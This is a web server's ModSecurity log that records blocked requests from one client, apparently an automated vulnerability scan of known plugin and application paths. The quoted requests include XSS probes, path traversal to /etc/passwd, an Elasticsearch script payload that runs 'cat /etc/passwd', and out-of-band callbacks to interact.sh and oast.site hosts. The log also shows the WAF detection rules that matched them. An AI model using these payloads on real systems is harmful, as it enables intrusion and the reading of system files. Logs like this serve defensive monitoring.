[Tue Aug 29 11:56:50.633668 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAqsWCwAAAAB"]
[Tue Aug 29 11:56:51.643791 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "digilibfh.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAolK78AAAAe"]
[Tue Aug 29 11:56:52.671099 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArB150AAAAV"]
[Tue Aug 29 11:56:52.798771 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtm4AAAAA"]
[Tue Aug 29 11:56:54.736042 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAArIAcoAAAAX"]
[Tue Aug 29 11:56:56.234687 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAoz8ScAAAAS"]
[Tue Aug 29 11:56:57.699384 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq-HkMAAAAT"]
[Tue Aug 29 11:56:59.667056 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAArbWQIAAAAG"]
[Tue Aug 29 11:57:00.965556 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAm80SUAAAAF"]
[Tue Aug 29 11:57:01.656378 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAq-HmwAAAAT"]
[Tue Aug 29 11:57:01.682876 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq-Hm0AAAAT"]
[Tue Aug 29 11:57:02.707846 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAArB1@kAAAAV"]
[Tue Aug 29 11:57:05.611968 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAq5@c8AAAAK"]
[Tue Aug 29 11:57:07.654818 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8Y0AAAAS"]
[Tue Aug 29 11:57:07.762989 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArbWUkAAAAG"]
[Tue Aug 29 11:57:08.605599 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq5@doAAAAK"]
[Tue Aug 29 11:57:08.839752 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BkAAAAV"]
[Tue Aug 29 11:57:11.532376 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAoz8bAAAAAS"]
[Tue Aug 29 11:57:12.188995 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@gcAAAAK"]
[Tue Aug 29 11:57:18.571407 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArLLhEAAAAb"]
[Tue Aug 29 11:57:18.733220 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb07ws1357hj5869.oast.site found within TX:1: cjmnijtjmimvgniikdb07ws1357hj5869.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArdQhEAAAAI"]
[Tue Aug 29 11:57:19.770719 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArePH0AAAAJ"]
[Tue Aug 29 11:57:23.738819 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAm80bEAAAAF"]
[Tue Aug 29 11:57:26.178940 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAArgDwAAAAAE"]
[Tue Aug 29 11:57:26.202775 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAoz8gAAAAAS"]
